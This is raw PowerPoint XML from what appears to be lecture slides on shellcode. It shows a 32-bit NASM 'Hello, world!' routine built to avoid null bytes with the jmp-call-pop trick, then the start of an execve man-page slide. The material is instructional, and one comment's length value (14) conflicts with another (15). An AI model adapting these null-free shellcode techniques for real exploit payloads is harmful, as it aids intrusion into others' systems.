            <a:ext cx="7211516" cy="3629199"/>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000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BITS 32             ;  Tell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> this is 32-bit code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> short one       ;  Jump down to a call at the end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>two:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssize_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> void *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; Pop  the return address (string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Zero  out full 32 bits of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> register.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> al, 4         ; Write  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #4 to the low byte of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Zero out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; Increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to 1,  STDOUT file descriptor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dl, 15        ; Length of the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: write(1, string, 14)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; void _exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> status);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> al, 1        ; Exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #1, the top 3 bytes are still zeroed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; Decrement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> back down to 0 for status = 0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80         ; Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: exit(0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>one:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  call two   ; Call back upwards to avoid null bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Hello, world!", 0x0a, 0x0d  ; with newline and carriage return bytes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370124124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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a: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smtClean="0"/>
              <a:t>Getting down to business</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="4398640"/>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000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EXECVE(2)                  Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Programmerâs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Manual                 EXECVE(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - execute program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYNOPSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
